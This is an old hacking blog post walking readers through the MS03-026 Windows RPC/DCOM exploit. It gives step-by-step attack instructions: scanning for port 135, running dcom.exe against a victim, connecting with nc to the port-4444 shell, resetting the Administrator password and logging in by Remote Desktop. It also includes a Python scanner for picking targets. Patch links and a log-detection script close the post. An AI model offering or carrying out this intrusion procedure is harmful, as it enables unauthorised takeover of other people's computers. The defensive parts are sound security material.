inteliture.com

Saturday, July 14, 2007

hack-RPC EXPLOIT

What is the RPC exploit?

RPC stands for Remote Procedure Call. The vulnerability (Microsoft Security Bulletin MS03-026, patch KB823980) lies in the way RPC is implemented in most versions of Windows. The flaw is in the Distributed Component Object Model (DCOM) interface on top of RPC, which listens on TCP port 135 (and also on 139, 445 and 593). The RPC service does not properly check the length of a field in incoming DCOM activation requests, so a specially crafted request sent to one of those ports overflows a stack buffer inside the RPCSS service, which runs as Local System. A remote attacker therefore needs no credentials to run commands with the highest system privileges. This is the same hole the Blaster (MSBlast) worm used in August 2003.

Operating systems affected

Microsoft Windows NT® 4.0
Microsoft Windows® 2000
Microsoft Windows XP
Microsoft Windows Server™ 2003

NOTE: Microsoft Windows Millennium, 95, 98, 98 SE are not affected.

Tools to use.

There are many programs you can download and use for this attack. Here are some:

  • Angry IP Scanner (in our "Scanners" download section)
  • dcom.exe (download the one for your target here)
  • nc.exe (in our "Scanners" download section)
  • RPC Exploit GUI v2 here

How to use them.

  1. Angry IP Scanner: First of all, open Angry IP Scanner and scan an IP range for hosts with TCP port 135 open.
  2. dcom.exe: You must run it from the command prompt (START ---> Run ---> cmd). Then type dcom followed by the target number and the victim's IP, e.g. dcom 5 127.0.0.0 (note that when you run dcom.exe without arguments it shows you which number stands for which OS and service pack; in this example I use number 5). The number has to match the victim's OS and service pack: with the wrong number the exploit usually crashes the RPC service (on XP this triggers the 60-second reboot countdown) instead of giving you a shell.
  3. nc.exe: Run nc.exe from the command prompt again, giving it the victim's IP and port 4444: nc <victim ip> 4444. If the exploit worked, a command shell is listening on port 4444 on the victim and nc connects you to it (note that the file might be named nc-something; just use its actual name or rename it to nc). In that shell type net user Administrator <password> to set the Administrator password to one you choose. So, if everything went right, go to START ---> Run ---> mstsc, type in your victim's IP and press Connect. This last step only works if Remote Desktop (Terminal Services) is enabled on the victim; otherwise keep using the nc shell. When connected, do whatever you like.
  4. RPC Exploit GUI v2: Not much to say except that it works fine (your antivirus might flag it as infected or as a Hacktool; read "Antiviruses" in the tutorials section). Much easier than the whole procedure described above.
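The scanning step above goes a bit further in the following added example, which is not code from the original post and is not any of the tools listed. Instead of only reporting port 135 as open, it sends a DCE/RPC bind for the endpoint mapper interface and checks whether a bind_ack comes back, so you know the port really is the Windows RPC service and not some other program sitting on 135. The address range 192.0.2.0/30 is a placeholder; the packet builder and reply parser run offline, only probe() touches the network. It does not tell you the OS and service pack (the number dcom.exe needs); you still have to find that out another way.

```python
"""Added example (not from the original post): confirm that hosts in a range
really expose the Windows RPC endpoint mapper on TCP/135 by sending a DCE/RPC
bind and classifying the reply. Standard library only."""
import ipaddress
import socket
import struct
import sys
import uuid

# Connection-oriented DCE/RPC PDU types (DCE 1.1 RPC spec, C706).
PTYPE_BIND = 11
PTYPE_BIND_ACK = 12
PTYPE_BIND_NAK = 13

# Endpoint mapper interface (v3.0) and the NDR transfer syntax (v2.0).
EPM_UUID = uuid.UUID("e1af8308-5d1f-11c9-91a4-08002b14a0fa")
NDR_UUID = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")


def build_bind(call_id: int = 1) -> bytes:
    """Build a minimal 72-byte DCE/RPC bind PDU for the endpoint mapper."""
    body = struct.pack("<HHI", 5840, 5840, 0)             # max xmit/recv frag, assoc group
    body += struct.pack("<BxH", 1, 0)                      # one presentation context, padding
    body += struct.pack("<HBx", 0, 1)                      # context id 0, one transfer syntax
    body += EPM_UUID.bytes_le + struct.pack("<HH", 3, 0)   # abstract syntax: EPM v3.0
    body += NDR_UUID.bytes_le + struct.pack("<HH", 2, 0)   # transfer syntax: NDR v2.0
    # Common header: version 5.0, ptype, flags FIRST|LAST, little-endian data
    # representation, fragment length, auth length, call id.
    header = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_BIND, 0x03,
                         b"\x10\x00\x00\x00", 16 + len(body), 0, call_id)
    return header + body


def parse_header(data: bytes) -> dict:
    """Parse the 16-byte common header; empty dict if this is not DCE/RPC v5."""
    if len(data) < 16:
        return {}
    vers, _minor, ptype, flags, _drep, frag_len, _auth_len, call_id = \
        struct.unpack("<BBBB4sHHI", data[:16])
    if vers != 5:
        return {}
    return {"ptype": ptype, "flags": flags, "frag_len": frag_len, "call_id": call_id}


def classify(data: bytes) -> str:
    """Label the reply to our bind: rpc-bind-ack, rpc-bind-nak, rpc-other or not-rpc."""
    hdr = parse_header(data)
    if not hdr:
        return "not-rpc"
    return {PTYPE_BIND_ACK: "rpc-bind-ack",
            PTYPE_BIND_NAK: "rpc-bind-nak"}.get(hdr["ptype"], "rpc-other")


def targets(cidr: str) -> list:
    """Expand a CIDR range into host addresses (network/broadcast excluded)."""
    return [str(h) for h in ipaddress.ip_network(cidr, strict=False).hosts()]


def probe(host: str, port: int = 135, timeout: float = 2.0) -> str:
    """Connect, send the bind, classify whatever comes back (network call)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_bind())
            return classify(s.recv(1024))
    except OSError as exc:
        return "closed/filtered (%s)" % exc.__class__.__name__


if __name__ == "__main__":
    # Placeholder range; pass your own CIDR as the first argument.
    for ip in targets(sys.argv[1] if len(sys.argv) > 1 else "192.0.2.0/30"):
        print(ip, probe(ip))
```

Run it with the range as its argument; hosts that answer rpc-bind-ack are the ones worth feeding to the next step. A bind_nak still proves an RPC service is there, while not-rpc means something else owns the port.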

How to protect yourself

Microsoft offers a freely downloadable patch for this vulnerability. It is available at:

Windows NT
http://download.microsoft.com/download/6/5/1/651c3333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE

Windows 2000
http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe

Windows XP
http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe

NOTE: If a link is broken, it is not our fault. Just visit http://download.microsoft.com/ and search for the patch yourself, or simply use Windows Update. The KB823980 fix (MS03-026) was later superseded by MS03-039 (KB824146), which closes further holes in the same RPCSS service, so prefer the newer cumulative patch. Beyond patching, block TCP ports 135, 139, 445 and 593 at the perimeter firewall (the exploit has to reach one of them), and disable DCOM on machines that do not need it.
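Patching closes the hole, but the procedure above also leaves a recognisable trail in firewall logs: one source sweeping port 135 across many hosts, and a connection to port 135 followed within seconds by one to port 4444 on the same host. The following added example (not from the original post) runs those two checks over constructed log lines in a made-up "time src dst dport action" format; the timestamps, addresses and the 60-second window are assumptions for illustration.

```python
"""Added example (not from the original post): flag the traffic pattern the
RPC/DCOM procedure leaves behind in firewall logs. Log format and sample
lines are constructed for this example."""
from collections import defaultdict
from datetime import datetime, timedelta

EXPLOIT_PORT = 135   # DCOM/RPC endpoint mapper, where the overflow is sent
SHELL_PORT = 4444    # where dcom.exe leaves its command shell listening
WINDOW = timedelta(seconds=60)   # assumed gap between exploit and nc connect

# Constructed sample: "time src dst dport action", one connection per line.
SAMPLE_LOG = """\
2007-07-14T10:00:01 203.0.113.7 192.0.2.10 135 ALLOW
2007-07-14T10:00:03 203.0.113.7 192.0.2.10 4444 ALLOW
2007-07-14T10:00:09 203.0.113.7 192.0.2.11 135 ALLOW
2007-07-14T10:05:00 198.51.100.4 192.0.2.10 135 ALLOW
2007-07-14T10:09:00 198.51.100.4 192.0.2.10 4444 ALLOW
2007-07-14T10:10:00 203.0.113.9 192.0.2.12 4444 DENY
"""


def parse(log_text: str) -> list:
    """Turn log lines into (timestamp, src, dst, dport, action) tuples."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, action = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, int(dport), action))
    return events


def find_bind_shell_followups(log_text: str, window: timedelta = WINDOW) -> list:
    """Pairs (src, dst) where dst got port 135 and then port 4444 from the same
    source within `window`. Returns [(src, dst, t_135, t_4444), ...]."""
    last_135 = {}
    hits = []
    for ts, src, dst, dport, action in sorted(parse(log_text)):
        if action != "ALLOW":        # a blocked shell connect never succeeded
            continue
        key = (src, dst)
        if dport == EXPLOIT_PORT:
            last_135[key] = ts
        elif dport == SHELL_PORT and key in last_135 and ts - last_135[key] <= window:
            hits.append((src, dst, last_135[key], ts))
    return hits


def noisy_scanners(log_text: str, min_hosts: int = 2) -> dict:
    """Sources that touched port 135 on at least `min_hosts` distinct hosts,
    allowed or denied: the port-135 sweep from step 1. Returns {src: count}."""
    seen = defaultdict(set)
    for _ts, src, dst, dport, _action in parse(log_text):
        if dport == EXPLOIT_PORT:
            seen[src].add(dst)
    return {src: len(hosts) for src, hosts in seen.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    for src, dst, t1, t2 in find_bind_shell_followups(SAMPLE_LOG):
        print("possible RPC/DCOM exploit + shell: %s -> %s (%s then %s)" % (src, dst, t1, t2))
    for src, count in noisy_scanners(SAMPLE_LOG).items():
        print("port-135 sweep: %s hit %d hosts" % (src, count))
```

In the sample, 203.0.113.7 is flagged by both checks, while 198.51.100.4 is not: its port-4444 connect comes four minutes after the port-135 one, outside the window, which is the sort of threshold you would tune against your own logs.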
